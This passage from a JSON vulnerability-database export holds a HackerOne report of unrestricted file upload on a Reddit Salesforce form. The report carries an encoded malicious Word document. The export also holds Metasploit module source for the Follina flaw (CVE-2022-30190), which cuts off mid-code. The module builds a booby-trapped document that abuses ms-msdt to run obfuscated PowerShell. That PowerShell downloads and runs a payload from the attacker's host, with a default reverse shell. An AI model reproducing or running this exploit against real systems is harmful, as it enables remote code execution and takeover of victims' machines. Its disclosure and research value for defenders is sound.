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\",\"\",\"Dummy Data.docx\",\"5005c000017FCu8AAG\",\"118.70.7.113\"],\"type\":\"rpc\",\"tid\":3,\"ctx\":{\"csrf\":\"VmpFPSxNakF5TWkwd05pMHlNMVF3T0Rvek1qb3lOQzQ0TURCYSxPeVQ1SlZBcnRoajJZQlJFS1c3QVlvLE5HVXhPRGN6\",\"vid\":\"0661J000003FS4V\",\"ns\":\"\",\"ver\":41}}\n```\n\nHere the data parameter contains the base64 encoded version of my clickme.docx file, which is based on the critical Follina vulnerability {F1780963}. This vulnerability can become a [zero click exploit](https://innovatecybersecurity.com/security-threat-advisory/follina-zero-day-allows-zero-click-rce-from-office-docs/).\n\n5. Response returns 200, indicated that there is no existing server side check for filetype and the file was uploaded successfully: \n```http\nHTTP/1.1 200 OK\nDate: Mon, 20 Jun 2022 08:41:53 GMT\nStrict-Transport-Security: max-age=63072000; includeSubDomains\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\nReferrer-Policy: origin-when-cross-origin\nCache-Control: no-cache,must-revalidate,max-age=0,no-store,private\nContent-Type: application/json;charset=UTF-8\nX-Powered-By: Salesforce.com Visualforce\nVary: Accept-Encoding\nConnection: close\nContent-Length: 142\n\n[{\"statusCode\":200,\"type\":\"rpc\",\"tid\":3,\"ref\":false,\"action\":\"AdvertisingHelpController\",\"method\":\"uploadFile\",\"result\":\"00P5c00001leROKEA2\"}]\n```\n\n## Impact\n\nAttacker can send malicious files to whoever handles the form behind https://reddit.secure.force.com/adhelp", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-20T09:10:53", "type": "hackerone", "title": "Reddit: Unrestricted File Upload on reddit.secure.force.com", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-30T14:56:49", "id": "H1:1606957", "href": "https://hackerone.com/reports/1606957", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2022-06-07T16:53:04", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-07T00:00:00", "type": "packetstorm", "title": "Microsoft Office Word MSDTJS Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-07T00:00:00", "id": "PACKETSTORM:167438", "href": "https://packetstormsecurity.com/files/167438/Microsoft-Office-Word-MSDTJS-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Office Word MSDTJS', \n'Description' => %q{ \nThis module generates a malicious Microsoft Word document that when loaded, will leverage the remote template \nfeature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` code. \n}, \n'References' => [ \n['CVE', '2022-30190'], \n['URL', 'https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/'], \n['URL', 'https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19'], \n['URL', 'https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/'], \n['URL', 'https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e'], \n['URL', 'https://twitter.com/GossiTheDog/status/1531608245009367040'], \n['URL', 'https://github.com/JMousqueton/PoC-CVE-2022-30190'] \n], \n'Author' => [ \n'nao sec', # Original disclosure. \n'mekhalleh (RAMELLA S\u00e9bastien)' # Zeop CyberSecurity \n], \n'DisclosureDate' => '2022-05-29', \n'License' => MSF_LICENSE, \n'Privileged' => false, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Payload' => { \n'DisableNops' => true \n}, \n'DefaultOptions' => { \n'DisablePayloadHandler' => false, \n'FILENAME' => 'msf.docx', \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'SRVHOST' => Rex::Socket.source_address('1.2.3.4') \n}, \n'Targets' => [ \n[ 'Microsoft Office Word', {} ] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'AKA' => ['Follina'], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [UNRELIABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptPath.new('CUSTOMTEMPLATE', [false, 'A DOCX file that will be used as a template to build the exploit.']), \nOptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true]) \n]) \nend \n \ndef get_file_in_docx(fname) \ni = @docx.find_index { |item| item[:fname] == fname } \n \nunless i \nfail_with(Failure::NotFound, \"This template cannot be used because it is missing: #{fname}\") \nend \n \n@docx.fetch(i)[:data] \nend \n \ndef get_template_path \ndatastore['CUSTOMTEMPLATE'] || File.join(Msf::Config.data_directory, 'exploits', 'word_msdtjs.docx') \nend \n \ndef generate_html \nuri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.ps1\" \n \ndummy = '' \n(1..random_int(61, 100)).each do |_n| \ndummy += '//' + rand_text_alpha(100) + \"\\n\" \nend \n \ncmd = Rex::Text.encode_base64(\"IEX(New-Object Net.WebClient).downloadString('#{uri}')\") \n \njs_content = \"window.location.href = \\\"ms-msdt:/id PCWDiagnostic /skip force /param \\\\\\\"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'#{cmd}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\\\\\\\"\\\";\" \nif datastore['OBFUSCATE'] \nprint_status('Obfuscate JavaScript content') \n \njs_content = Rex::Exploitation::JSObfu.new js_content \njs_content = js_content.obfuscate(memory_sensitive: false) \nend \n \nhtml = '<!DOCTYPE html><html><head><meta http-equiv=\"Expires\" content=\"-1\"><meta http-equiv=\"X-UA-Compatible\" content=\"IE=11\"></head><body><script>' \nhtml += \"\\n#{dummy}\\n#{js_content}\\n\" \nhtml += '</script></body></html>' \n \nhtml \nend \n \ndef inject_docx \ndocument_xml = get_file_in_docx('word/document.xml') \nunless document_xml \nfail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml') \nend \n \ndocument_xml_rels = get_file_in_docx('word/_rels/document.xml.rels') \nunless document_xml_rels \nfail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels') \nend \n \nuri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html\" \n@docx.each do |entry| \ncase entry[:fname] \nwhen 'word/_rels/document.xml.rels' \nentry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', \"#{uri}!\") \nend \nend \nend \n \ndef normalize_uri(*strs) \nnew_str = strs * '/' \n \nnew_str = new_str.gsub!('//', '/') while new_str.index('//') \n \n# makes sure there's a starting slash \nunless new_str.start_with?('/') \nnew_str = '/' + new_str \nend \n \nnew_str \nend \n \ndef on_request_uri(cli, request) \nheader_html = { \n'Access-Control-Allow-Origin' => '*', \n'Access-Control-Allow-Methods' => 'GET, POST', \n'Cache-Control' => 'no-store, no-cache, must-revalidate', 